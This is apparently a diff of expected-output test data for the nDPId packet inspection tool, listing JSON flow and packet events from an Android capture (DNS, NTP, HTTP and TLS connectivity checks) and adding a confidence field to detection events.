+00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1582454866894,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1582454866894,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAEAQAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1582454867034,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1582454867034,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA\/qSJAAEARDCrAqAIQwKgCAc7ZADUAKwPW+6YBAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAE="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454867075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1582454867075,"pkt":"TGr2n\/YnxiwDYGpkCABFAADPTgIAAEARprrAqAIBwKgCEAA1ztkAu4V++6aBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABCKACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAACCAA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAVQAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEwAEEf01ycB\/AAEAAQAAABMABBH9NdA="}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}}
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454867244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1582454867244,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qTJAAEARDBvAqAIQwKgCAYvxADUAKg90oPQBAAABAAAAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAQ=="}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454867284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"ts_msec":1582454867284,"pkt":"TGr2n\/YnxiwDYGpkCABFAAB+z3oAAEARJZPAqAIBwKgCEAA1i\/EAapnsoPSBgAABAAQAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAcAMAAEAAQAAARgABNjvIwjADAABAAEAAAEYAATY7yMAwAwAAQABAAABGAAE2O8jBMAMAAEAAQAAARgABNjvIww="}
-00748{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454867284,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.35.8"}}
+00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454867284,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.35.8"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1582454867323,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1582454867323,"pkt":"xiwDYGpkTGr2n\/YnCABFAABMoTdAAEAR2rnAqAIQ2O8jCLMnAHsAOGfAGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOH81o7jEm7M"}
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP.Google","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
+00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454867358,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1582454867358,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMa8oAAGcRKSfY7yMIwKgCEAB7sycAOKcPHAEA7AAAAAAAAAAMR09PR+H81tNW8KhI4fzWjuMSbszh\/NbTVvCoSeH81tNW8KhL"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454867637,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454867637,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqXVAAEARC9XAqAIQwKgCAYbsADUALQrUr3oBAAABAAAAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAQ=="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454867639,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454867639,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRpSEAAEARUBnAqAIBwKgCEAA1huwAPTVyr3qBgAABAAEAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454867723,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454867723,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqYtAAEARC7\/AqAIQwKgCAdY1ADUALYAStecBAAABAAAAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
